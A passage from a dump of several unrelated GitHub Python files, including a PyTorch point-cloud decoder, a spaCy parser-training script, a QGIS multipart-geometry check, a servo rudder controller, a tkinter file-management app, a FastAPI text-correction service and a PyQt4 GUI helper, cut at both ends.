torch.cuda.is_available() else 'cpu'\n\n # Define number of points per primitives\n self.nb_primitives = nb_primitives\n self.nb_pts_in_primitive = number_points // nb_primitives\n self.nb_pts_in_primitive_eval = number_points // nb_primitives\n\n # Initialize templates\n self.template = [SquareTemplate(self.device) for i in range(0, self.nb_primitives)]\n\n # Initialize deformation networks\n self.decoder = nn.ModuleList([Mapping2Dto3D() for i in range(0, nb_primitives)])\n\n\n def forward(self, content_latent_vector, style_latent_vector, train=True):\n \"\"\"\n Deform points from self.template using the embedding latent_vector\n :param train: a boolean indicating training mode\n :param content_latent_vector: an opt.bottleneck size vector encoding the content of a 3D shape.\n size : batch, bottleneck\n :param style_latent_vector: an opt.bottleneck size vector encoding the style of a 3D shape.\n size : batch, bottleneck\n :return: A deformed pointcloud of size : batch, nb_prim, num_point, 3\n \"\"\"\n if train:\n input_points = [self.template[i].get_random_points(\n torch.Size((1, self.template[i].dim, self.nb_pts_in_primitive)),\n content_latent_vector.device) for i in range(self.nb_primitives)]\n else:\n input_points = [self.template[i].get_regular_points(self.nb_pts_in_primitive_eval,\n device=content_latent_vector.device)\n for i in range(self.nb_primitives)]\n\n # 
Deform each patch\n num_adabn_params = get_num_ada_norm_params(self.decoder[0])\n # print(num_adabn_params)\n # print(style_latent_vector.shape)\n # print(seld.decoder[0])\n # output_patches = [self.decoder[i](input_points[i],\n # content_latent_vector.unsqueeze(2),\n # style_latent_vector[:, i*num_adabn_params:(i+1)*num_adabn_params]\n # ).unsqueeze(1)\n # for i in range(0, self.nb_primitives)]\n output_patches = [self.decoder[i](input_points[i],\n content_latent_vector.unsqueeze(2),\n style_latent_vector.unsqueeze(2)\n ).unsqueeze(1)\n for i in range(0, self.nb_primitives)]\n \n\n output_points = torch.cat(output_patches, dim=1)\n\n output = {\n 'faces': None,\n # 'points_1': pred_y1,\n # 'points_2': pred_y2,\n 'points_3': output_points.contiguous(), # batch, nb_prim, num_point, 3\n }\n return output\n","repo_name":"shahjui2000/674_Pro","sub_path":"src/styleatlasnet.py","file_name":"styleatlasnet.py","file_ext":"py","file_size_in_byte":11491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2181613340","text":"import spacy\nimport random\nfrom spacy.util import minibatch, compounding\nfrom spacy.language import Language\nfrom spacy.tokens import Doc, Token, Span\n\nmodel_name = 'C:\\Proyectos\\AnalisiLogica\\it_model_mons'\n\n\nclass NLPCustomRules(object):\n Token.set_extension(\"is_name\", default=False)\n\n def new_component(doc):\n\n #print(\"After tokenization, this doc has {} tokens.\".format(len(doc)))\n #print(\"The part-of-speech tags are:\", [token.pos_ for token in doc])\n\n for token in doc:\n if token.text == 'Formatisi':\n token._.is_name = ' Formare'\n\n #if len(doc) < 10:\n #print(\"This is a pretty short document.\")\n\n return doc\n\n#Model factories\nLanguage.factories['parser1'] = lambda nlp, **cfg: NLPCustomRules.new_component(nlp, **cfg)\n\nnlp = spacy.load('it_core_news_sm')\n\nnlp.add_pipe(NLPCustomRules.new_component, name='parser1', last=True)\n\n# Parser training data\nTRAIN_DATA = [\n (\n \"gioca in cucina\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n ),\n (\n \"corre nel salone\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n )\n\n]\n\n\n#nlp = spacy.load(\"it_core_news_sm\")\n\n# We'll use the built-in dependency parser class, but we want to create a\n# fresh instance – just in case.\nif \"parser1\" in nlp.pipe_names:\n nlp.remove_pipe(\"parser1\")\n\nparser1 = nlp.create_pipe(\"parser1\")\nnlp.add_pipe(parser1, first=True)\n\nfor text, annotations in TRAIN_DATA:\n for dep in annotations.get(\"deps\", []):\n parser1.add_label(dep)\n\npipe_exceptions = [\"parser1\", \"trf_wordpiecer\", \"trf_tok2vec\"]\nother_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\nn_iter = 7\n\nwith nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, losses=losses)\n print(\"Losses\", losses)\n\n\n#Save the model\nnlp.to_disk(model_name)\n\n\nnlp = spacy.load(model_name)\n\ndoc = nlp(\"Il vento scuote i rami degli alberi.\")\n\nprint(nlp.pipeline)\n\nprint([(t.text, t.dep_, t.head.text) for t in doc if t.dep_ != \"-\"])\n\n\n\n\n\n\n\ntextcat = 
nlp.get_pipe(\"my_component11\")\n#nlp.disable_pipes(\"my_component\")\n\n\nfor text, annotations in TRAIN_DATA:\n for dep in annotations.get(\"deps\", []):\n textcat.add_label(dep)\n\n\npipe_exceptions = [\"textcat\"]\nother_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\nn_iter = 7\n\nwith nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, losses=losses)\n print(\"Losses\", losses)\n\n\ndef my_component(doc):\n print(\"After tokenization, this doc has {} tokens.\".format(len(doc)))\n print(\"The part-of-speech tags are:\", [token.pos_ for token in doc])\n\n Token.set_extension('is_name', default=False)\n\n for token in doc:\n if token.text == 'Formatisi':\n token._.is_name = ' Formare'\n\n if len(doc) < 10:\n print(\"This is a pretty short document.\")\n return doc\n\n\nTRAIN_DATA = [\n (\n \"gioca in cucina\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n ),\n (\n \"corre nel salone\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n )\n\n]\n","repo_name":"SimoneMons/phtree_analisiLogica","sub_path":"TrainingHeadsDep.py","file_name":"TrainingHeadsDep.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28819593982","text":"# -*- coding: utf-8 -*-\nfrom qgis.PyQt.QtCore import QCoreApplication\nfrom qgis.core import (QgsProcessing,\n QgsFeatureSink,\n QgsProcessingAlgorithm,\n QgsProcessingParameterFeatureSink,\n QgsCoordinateReferenceSystem,\n QgsProcessingParameterMultipleLayers,\n QgsFeatureRequest,\n QgsExpression,\n QgsFeature\n )\nfrom qgis import processing\nfrom qgis.utils import iface\nclass IdentifyMultipleParts(QgsProcessingAlgorithm): \n\n INPUT_LAYERS = 'INPUT_LAYER_LIST'\n OUTPUT = 'OUTPUT'\n\n def initAlgorithm(self, config=None):\n self.addParameter(\n QgsProcessingParameterMultipleLayers(\n 'INPUT_LAYER_LIST',\n self.tr('Selecionar camadas'),\n QgsProcessing.TypeVectorAnyGeometry\n )\n )\n self.addParameter(\n QgsProcessingParameterFeatureSink(\n self.OUTPUT,\n self.tr('Flag Multiplas Partes')\n )\n ) \n def processAlgorithm(self, parameters, context, feedback): \n feedback.setProgressText('Procurando multi geometria com mais de uma parte...')\n layerList = self.parameterAsLayerList(parameters,'INPUT_LAYER_LIST', context)\n CRSstr = iface.mapCanvas().mapSettings().destinationCrs().authid()\n CRS = QgsCoordinateReferenceSystem(CRSstr)\n #4 = multipoint, 5 = multiline, 6 = multipolygon\n featuresToAdd = {4:[], 5:[], 6:[]}\n newLayer = {4:False, 5:False, 6:False}\n step = 0\n listSize = len(layerList)\n progressStep = 100/listSize if listSize else 0\n returnMessage = 'nenhuma inconsistência encontrada'\n\n for step,layer in enumerate(layerList):\n if feedback.isCanceled():\n return {self.OUTPUT: outputLog}\n expr = QgsExpression( \"num_geometries( $geometry ) > 1\" )\n for feature in layer.getFeatures(QgsFeatureRequest(expr)): \n featuresToAdd[feature.geometry().wkbType()].append(feature) \n feedback.setProgress( step * progressStep )\n for key in featuresToAdd:\n if not len(featuresToAdd[key]) == 0:\n newLayer[key] = self.outLayer(parameters, context, featuresToAdd[key], 
CRS, key)\n returnMessage = 'camada(s) com inconsistência(s) gerada(s)'\n return{self.OUTPUT: returnMessage}\n \n def outLayer(self, parameters, context, features, CRS, geomType):\n newFields = features[0].fields()\n\n (sink, newLayer) = self.parameterAsSink(\n parameters,\n self.OUTPUT,\n context,\n newFields,\n geomType,\n CRS\n )\n \n for feature in features:\n newFeat = QgsFeature()\n newFeat.setGeometry(feature.geometry())\n newFeat.setFields(newFields)\n for field in range(len(feature.fields())):\n newFeat.setAttribute((field), feature.attribute((field)))\n sink.addFeature(newFeat, QgsFeatureSink.FastInsert)\n \n return newLayer\n \n def tr(self, string):\n return QCoreApplication.translate('Processing', string)\n\n def createInstance(self):\n return IdentifyMultipleParts()\n\n def name(self):\n return 'identifymultipleparts'\n\n def displayName(self):\n return self.tr('Identifica Geometria com Multiplas Partes')\n\n def group(self):\n return self.tr('Missoes')\n\n def groupId(self):\n return 'missoes'\n\n def shortHelpString(self):\n return self.tr(\"O algoritmo identifica se existe alguma geometria com mais de uma parte\")\n \n","repo_name":"1cgeo/ferramentas_experimentais","sub_path":"processings/identifyMultipleParts.py","file_name":"identifyMultipleParts.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20496163702","text":"import os\nimport numpy as np\n \nclass Rudder:\n \n def __init__(self, pin, nav, pi):\n \n self.pi = pi\n self.pin = pin\n self.right = 600\n self.mid = 1134\n self.left = 1800\n \n self.degrees = np.linspace(self.right, self.mid, 60).tolist() + np.linspace(self.mid, self.left, 60).tolist()\n \n for i, d in enumerate(self.degrees):\n self.degrees[i] = int(round(d, 0))\n \n \n def set_heading(self, heading : int) -> None:\n \n hz = self.degrees[heading+59]\n self.pi.set_servo_pulsewidth(self.pin, hz)\n\n\n def heading_compansation(self, offset) -> None:\n\n #print(f\"[RUDDER] Offset compansation: {offset}\")\n \n head = 1\n diff_offset = abs(offset)\n if offset < 0:\n head = -1\n\n if diff_offset > 90:\n self.set_heading(40*head)\n elif diff_offset > 45:\n self.set_heading(20*head)\n elif diff_offset > 30:\n self.set_heading(15*head)\n elif diff_offset > 10:\n self.set_heading(10*head)\n elif diff_offset > 5:\n self.set_heading(5*head)\n\n","repo_name":"DenEkteTruls/Hydromapper","sub_path":"nav/rudder.py","file_name":"rudder.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42755946068","text":"\r\n # Used for performing operating system related operations like listing files, deleting files, etc.\r\nimport os\r\n# Used for high-level file operations like moving files, copying files, etc.\r\nimport shutil \r\n# Used to create GUI windows and widgets\r\nimport tkinter as tk \r\n# Used to create various GUI dialogs like file dialog, message box, etc.\r\nfrom tkinter import filedialog, messagebox, simpledialog\r\n# Module for working with JSON data \r\nimport json\r\n# for working with time-related functions\r\nimport time\r\n# for working with file paths\r\nfrom pathlib import Path\r\n\r\n#create class of app\r\nclass FileUtilityApp:\r\n def __init__(self):\r\n # main window of app with tk\r\n self.window = tk.Tk()\r\n self.window.title(\"File Editor\")\r\n self.window.geometry(\"600x710\")\r\n\r\n # top frame for the welcome label and description\r\n 
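The QGIS record that closes above, identifyMultipleParts.py, boils down to a single predicate: the expression `num_geometries($geometry) > 1` evaluated per feature through a `QgsFeatureRequest`. The same test is easy to state outside QGIS; here is an illustrative sketch using shapely, which is an assumption of the sketch, not a dependency of the plugin:

```python
from shapely.geometry import MultiPolygon, Polygon

def has_multiple_parts(geom) -> bool:
    # Mirrors the plugin's num_geometries($geometry) > 1 expression
    return len(geom.geoms) > 1

single = MultiPolygon([Polygon([(0, 0), (1, 0), (1, 1)])])
double = MultiPolygon([Polygon([(0, 0), (1, 0), (1, 1)]),
                       Polygon([(2, 2), (3, 2), (3, 3)])])

assert not has_multiple_parts(single)   # one part: not flagged
assert has_multiple_parts(double)       # two parts: would be flagged
```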
top_frame = tk.Frame(self.window)\r\n top_frame.pack(side=tk.TOP, padx=20, pady=20)\r\n\r\n # welcome heading\r\n welcome_label = tk.Label(\r\n top_frame, text=\"Welcome to File Editor\",\r\n font=(\"Helvetica\", 24, \"bold\")\r\n )\r\n welcome_label.pack()\r\n\r\n # multi line string app description\r\n app_description = (\r\n \"This application allows you to perform various file and folder operations.\\n\\n\"\r\n \"Features include:\\n\"\r\n \"- Searching files in a directory\\n\"\r\n \"- Moving files between directories\\n\"\r\n \"- Deleting files\\n\"\r\n \"- Creating new folders\\n\"\r\n \"- Viewing recent changes\\n\"\r\n \"- Saving recent changes to a file\\n\"\r\n \"- Viewing file properties\\n\"\r\n )\r\n description_label = tk.Label(\r\n top_frame, text=app_description, justify=tk.LEFT, font=(\"Helvetica\", 8, \"bold\")\r\n )\r\n description_label.pack(pady=5)\r\n\r\n # search button\r\n search_button = tk.Button(\r\n self.window, text=\"Search Files\", command=self.search_files,\r\n fg=\"#fff\", bg=\"#4CAF50\", activebackground=\"#3E8E41\", bd=0,\r\n padx=10, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n search_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # move button\r\n move_button = tk.Button(\r\n self.window, text=\"Move Files\", command=self.move_files,\r\n fg=\"#fff\", bg=\"#2196F3\", activebackground=\"#0E88B1\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n move_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # delete button\r\n delete_button = tk.Button(\r\n self.window, text=\"Delete Files\", command=self.delete_files,\r\n fg=\"#fff\", bg=\"#F44336\", activebackground=\"#A92C25\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n delete_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # the create folder button\r\n create_folder_button = tk.Button(\r\n self.window, text=\"Create Folder\", command=self.create_folder,\r\n fg=\"#fff\", bg=\"#FFC107\", activebackground=\"#E09600\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n create_folder_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # recent changes button\r\n recent_changes_button = tk.Button(\r\n self.window, text=\"Recent Changes\", command=self.show_recent_changes,\r\n fg=\"#fff\", bg=\"#607D8B\", activebackground=\"#455A64\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n recent_changes_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # save recent changes button\r\n save_changes_button = tk.Button(\r\n self.window, text=\"Save Recent Changes\", command=self.save_recent_changes,\r\n fg=\"#fff\", bg=\"#9C27B0\", activebackground=\"#6A1B9A\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n save_changes_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n\r\n # empty list for self class, used to store recent changes\r\n self.recent_changes = []\r\n\r\n # view file properties button\r\n view_file_properties_button = tk.Button(\r\n self.window, text=\"View File Properties\", 
command=self.view_file_properties,\r\n fg=\"#fff\", bg=\"#009688\", activebackground=\"#00695C\", bd=0,\r\n padx=16, pady=8, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n view_file_properties_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n def search_files(self):\r\n # Show a file dialog box to choose the directory to search in\r\n directory = filedialog.askdirectory(title=\"Select Directory to Search In\")\r\n if directory:\r\n # Show a message box with the list of files found in the directory\r\n files = os.listdir(directory)\r\n message = f\"Files found in {directory}:\\n\\n{files}\"\r\n messagebox.showinfo(\"Search Results\", message)\r\n\r\n def move_files(self):\r\n # Show a file dialog box to choose the file to move\r\n source_file = filedialog.askopenfilename(title=\"Select File to Move\")\r\n if source_file:\r\n # Show a file dialog box to choose the destination directory\r\n destination_dir = filedialog.askdirectory(\r\n title=\"Select Destination Directory\"\r\n )\r\n if destination_dir:\r\n try:\r\n # Move the file to the destination directory\r\n destination_file = os.path.join(\r\n destination_dir, os.path.basename(source_file)\r\n )\r\n shutil.move(source_file, destination_file)\r\n # Add the time, file name, and description of the change to the recent changes list\r\n modification_time = os.path.getmtime(destination_file)\r\n change_description = f\"{source_file} moved to {destination_file}\"\r\n self.recent_changes.append(f\"{change_description} ({modification_time})\")\r\n # Show a message box to confirm that the move was successful\r\n messagebox.showinfo(\r\n \"Move Successful\", f\"{source_file} moved to {destination_file}\"\r\n )\r\n except Exception as e:\r\n # Show an error message box if the move operation failed\r\n messagebox.showerror(\r\n \"Error\", f\"Error moving file: {str(e)}\"\r\n )\r\n\r\n def delete_files(self):\r\n # Show a file dialog box to choose the file to delete\r\n file_to_delete = filedialog.askopenfilename(title=\"Select File to Delete\")\r\n if file_to_delete:\r\n # Add the time, file name, and description of the change to the recent changes list\r\n modification_time = os.path.getmtime(file_to_delete)\r\n change_description = f\"{file_to_delete} deleted\"\r\n self.recent_changes.append(f\"{change_description} ({modification_time})\")\r\n # Show a message box to confirm that the user really wants to delete the file\r\n if messagebox.askyesno(\r\n \"Confirm Delete\", f\"Are you sure you want to delete {file_to_delete}?\"\r\n ):\r\n # Delete the file\r\n os.remove(file_to_delete)\r\n # Show a message box to confirm that the delete was successful\r\n messagebox.showinfo(\"Delete Successful\", f\"{file_to_delete} deleted\")\r\n\r\n # function to create a new folder\r\n def create_folder(self):\r\n # Show a file dialog box to choose the directory to create the folder in\r\n directory = filedialog.askdirectory(\r\n title=\"Select Directory to Create Folder In\"\r\n )\r\n if directory:\r\n # Show an entry dialog box to get the name of the new folder\r\n folder_name = simpledialog.askstring(\r\n \"Create Folder\", \"Enter the name of the new folder:\"\r\n )\r\n if folder_name:\r\n # Create the new folder\r\n new_folder = os.path.join(directory, folder_name)\r\n os.mkdir(new_folder)\r\n # Add the time and folder name to the recent changes list\r\n modification_time = os.path.getmtime(new_folder)\r\n self.recent_changes.append(f\"{new_folder} 
({modification_time})\")\r\n # Show a message box to confirm that the folder was created\r\n messagebox.showinfo(\"Folder Created\", f\"Folder {new_folder} created\")\r\n\r\n # function to display recent changes\r\n def show_recent_changes(self):\r\n # Show a message box with the list of recent changes\r\n message = \"Recent changes:\\n\\n\" + \"\\n\".join(self.recent_changes)\r\n messagebox.showinfo(\"Recent Changes\", message)\r\n\r\n # save the recent changes\r\n def save_recent_changes(self):\r\n # Show a file dialog box to choose the file to save to\r\n file_to_save = filedialog.asksaveasfilename(\r\n title=\"Save Recent Changes As\",\r\n defaultextension=\".txt\",\r\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")],\r\n )\r\n if file_to_save:\r\n # Write the recent changes list to the file\r\n with open(file_to_save, \"w\") as f:\r\n f.write(\"\\n\".join(self.recent_changes))\r\n # Show a message box to confirm that the save was successful\r\n messagebox.showinfo(\"Save Successful\", f\"Recent changes saved to {file_to_save}\")\r\n\r\n\r\n def view_file_properties(self):\r\n # Show a file dialog box to choose the file\r\n file_to_view = filedialog.askopenfilename(title=\"Select File to View Properties\")\r\n if file_to_view:\r\n # Get the file properties using the get_file_properties function\r\n file_properties = self.get_file_properties(file_to_view)\r\n \r\n # Create a mini frame (Toplevel) to display the file properties as a separate window\r\n mini_frame = tk.Toplevel(self.window)\r\n mini_frame.title(\"File Properties\")\r\n mini_frame.geometry(\"400x300\")\r\n\r\n # Add a scrollbar to the mini frame for easier navigation of the content\r\n scrollbar = tk.Scrollbar(mini_frame)\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n \r\n # Create a text widget to display the JSON content of the file properties\r\n text_widget = tk.Text(mini_frame, wrap=tk.WORD, yscrollcommand=scrollbar.set)\r\n # Insert the file properties (formatted as JSON with indents) into the text widget\r\n text_widget.insert(tk.END, json.dumps(file_properties, indent=2))\r\n # Add the text widget to the mini frame and fill it to the available space\r\n text_widget.pack(expand=True, fill=tk.BOTH)\r\n \r\n # Configure the scrollbar to control the text widget's vertical scrolling\r\n scrollbar.config(command=text_widget.yview)\r\n\r\n def get_file_properties(self, file_path):\r\n # Use the pathlib.Path object to represent the file path\r\n file = Path(file_path)\r\n # Get the file's stat object, which contains information about the file\r\n file_stat = file.stat()\r\n \r\n # i made dictionary of the file properties using the stat object and pathlib.Path attributes\r\n properties = {\r\n \"name\": file.name, # File name\r\n \"path\": str(file), # Full file path as a string\r\n \"size\": file_stat.st_size, # File size in bytes\r\n \"created\": time.ctime(file_stat.st_ctime), # Creation time as a string\r\n \"modified\": time.ctime(file_stat.st_mtime), # Modification time as a string\r\n \"accessed\": time.ctime(file_stat.st_atime), # Access time as a string\r\n }\r\n \r\n # Return the dictionary containing the file properties\r\n return properties\r\n\r\n # run the tkinter window\r\n def run(self):\r\n self.window.mainloop()\r\n\r\n# create a FileUtilityApp object and run the application\r\nif __name__ == \"__main__\":\r\n app = FileUtilityApp()\r\n 
app.run()\r\n","repo_name":"jcast6/file-edit-app","sub_path":"file_editor.py","file_name":"file_editor.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775795463","text":"from tensorflow.python.framework.tensor_conversion_registry import get\nimport uvicorn\nfrom fastapi import FastAPI\nfrom correct_teencode import correct_teencode\nfrom correct_telex import TelexErrorCorrector\nfrom pydantic import BaseModel\nfrom accent import get_accented\n\ntelexCorrector = TelexErrorCorrector()\n\napp = FastAPI()\n\n\nclass Request(BaseModel):\n text: str\n\n\n@app.post(\"/correct-teencode\")\ndef teencode(data: Request):\n data = data.dict()\n corrected = correct_teencode(data[\"text\"])\n return {\"result\": corrected}\n\n\n@app.post(\"/correct-telex\")\ndef telex(data: Request):\n data = data.dict()\n corrected = telexCorrector.fix_telex_sentence(data[\"text\"])\n return {\"result\": corrected}\n\n@app.post(\"/correct-accent\")\ndef accent(data: Request):\n data = data.dict()\n corrected = get_accented(data[\"text\"])\n return {\"result\": corrected}\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)\n","repo_name":"duytran-vio/correct_teencode","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31856859618","text":"config = dict(\n \n # training\n load_saved_model = True,\n num_epoch = 200,\n batch_size = 8,\n learning_rate = 3e-4,\n\n # video\n in_channels = 3, # image\n image_H = 96,\n image_W = 96,\n\n # audio \n audio_dim = 64, # number of mfcc coef\n\n # model\n dim = 128, \n patch_size_h = 32, # patch size must be devisive by image size\n patch_size_w = 32,\n max_num_frames = 256, # input max seq len\n depth = 6,\n heads = 4,\n pool = 'cls',\n dim_head = 64,\n dropout = 0.2,\n emb_dropout = 0.2,\n scale_dim = 4,\n audio_scale = 4, # for vivit_w_audio_v2\n\n # loader\n num_workers = 4,\n)","repo_name":"Ethan07902050/ttm","sub_path":"ViViT-w-Audio/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11856139156","text":"from PyQt4.QtCore import Qt,SIGNAL\r\nfrom PyQt4.QtGui import QAction,QToolBar,QIcon\r\nfrom elm_tools import MouseTool,SelectTool\n\r\nclass ElmGUI (object) :\r\n\t\"\"\"an empty implementation of a GUI that do nothing\r\n\t\"\"\"\r\n\tdef __init__ (self) :\r\n\t\t\"\"\"initialize the GUI.\r\n\t\t\"\"\"\r\n\t\tself._created = False\n\t\tself._installed = None\r\n\t\r\n\t###########################################\r\n\t#\r\n\t#\t\tGUI interface\r\n\t#\r\n\t###########################################\r\n\tdef setup_ui (self) :\n\t\t\"\"\"Create all GUI components.\n\t\t\n\t\treturn True if components need to be created\n\t\t\"\"\"\n\t\tif self._created :\n\t\t\t#do nothing, this method has already been called\n\t\t\treturn False\n\t\telse :\n\t\t\tself._created = True\n\t\t\treturn True\r\n\t\n\tdef clean (self) :\n\t\t\"\"\"Clean the gui if needed.\n\t\t\"\"\"\n\t\tpass\n\t\n\tdef installed (self) :\n\t\t\"\"\"Return the viewer in which this gui\n\t\tis currently installed or None if\n\t\tthe gui is not installed\n\t\t\"\"\"\n\t\treturn self._installed\n\t\r\n\tdef install (self, main_window) :\r\n\t\t\"\"\"Install all GUI components in the main 
window.\n\t\t\"\"\"\n\t\tself._installed = main_window\r\n\t\r\n\tdef uninstall (self, main_window) :\r\n\t\t\"\"\"Uninstall all GUI components from the main window.\n\t\t\"\"\"\n\t\tself._installed = None\r\n\t\n\tdef emit (self, signal, args) :\n\t\t\"\"\"Force the viewer to emit a signal.\n\t\tIf the GUI is not installed do nothing.\n\t\t\"\"\"\n\t\tmw = self.installed()\n\t\tif mw is not None :\n\t\t\tmw.emit(SIGNAL(signal),args)\n\t\n\t###########################################\r\n\t#\r\n\t#\t\thelp functions to install GUI elements\r\n\t#\r\n\t###########################################\n\tdef add_action_bar (self, main_window, bar) :\n\t\t\"\"\"Add a toolbar that contains actions.\n\t\t\"\"\"\n\t\tmain_window.addToolBar(bar)\n\t\tbar.show()\n\t\n\tdef add_tool_bar (self, main_window,\n\t bar,\n\t bar_position = Qt.LeftToolBarArea) :\n\t\t\"\"\"Add a toolbar that contains tools.\n\t\t\"\"\"\n\t\tmain_window.addToolBar(bar_position,bar)\n\t\tbar.show()\n\t\tfor action in bar.actions() :\n\t\t\tif isinstance(action,MouseTool) :\n\t\t\t\tmain_window.add_tool(action)\n\t\n\tdef remove_bar (self, main_window, bar) :\n\t\t\"\"\"Remove a toolbar from viewer\n\t\teither containing tools or actions.\n\t\t\"\"\"\n\t\tmain_window.removeToolBar(bar)\n\t\tbar.setParent(None)\n\t\tfor action in bar.actions() :\n\t\t\tif isinstance(action,MouseTool) :\n\t\t\t\tmain_window.remove_tool(action)\n\t\n\tdef add_status_widget (self, main_window, widget, is_permanent = True) :\n\t\t\"\"\"Add a widget in the status bar.\n\t\t\"\"\"\n\t\tif is_permanent :\n\t\t\tmain_window.statusBar().addPermanentWidget(widget)\n\t\telse :\r\n\t\t\tmain_window.statusBar().addWidget(widget)\n\t\twidget.show()\n\t\n\tdef remove_status_widget (self, main_window, widget) :\n\t\t\"\"\"Remove a widget from the status bar.\n\t\t\n\t\tAs soon as there is no more visible widgets,\n\t\tremove the status bar.\n\t\t\"\"\"\n\t\tstatus = main_window.statusBar()\n\t\tstatus.removeWidget(widget)\n\t\twidget.setParent(None)\n\t\tif len(status.children() ) == 2 :\n\t\t\tmain_window.setStatusBar(None)\n\nclass TemplateGUI (ElmGUI) :\n\t\"\"\"A custom class to interactively add elements to a GUI.\n\t\"\"\"\n\tdef __init__ (self, name) :\n\t\tElmGUI.__init__(self)\n\t\tself._name = name\n\t\tself._action_bar = None\n\t\tself._actions = []\n\t\tself._tool_bar = None\n\t\tself._tools = []\n\t\tself._tool_bar_position = Qt.LeftToolBarArea\n\t\n\t###############################################\n\t#\n\t#\t\taccess to attributes\n\t#\n\t###############################################\n\tdef set_tools_position (self, position) :\n\t\t\"\"\"Set the position of the toolbar.\n\t\t\n\t\tposition: a string, either 'left' or 'bottom'.\n\t\t\"\"\"\n\t\tif position == \"left\" :\n\t\t\tself._tool_bar_position = Qt.LeftToolBarArea\n\t\telif position == \"bottom\" :\n\t\t\tself._tool_bar_position = Qt.BottomToolBarArea\n\t\telse :\n\t\t\traise UserWarning(\"position '%s' not recognized (either left or bottom)\" % str(position) )\n\t\n\tdef create_action (self, name, func, icon, descr) :\n\t\t\"\"\"Create an action from its description.\n\t\tassert action_bar is not None.\n\t\t\"\"\"\n\t\taction = self._action_bar.addAction(name)\n\t\tif icon is not None :\n\t\t\tif isinstance(icon,QIcon) :\n\t\t\t\taction.setIcon(icon)\n\t\t\telse :\n\t\t\t\taction.setIcon(QIcon(icon) )\n\t\tif descr == \"\" :\n\t\t\taction.setToolTip(name)\n\t\telse :\n\t\t\taction.setToolTip(descr)\n\t\taction.connect(action,SIGNAL(\"triggered(bool)\"),func)\n\t\treturn action\n\t\t\n\tdef 
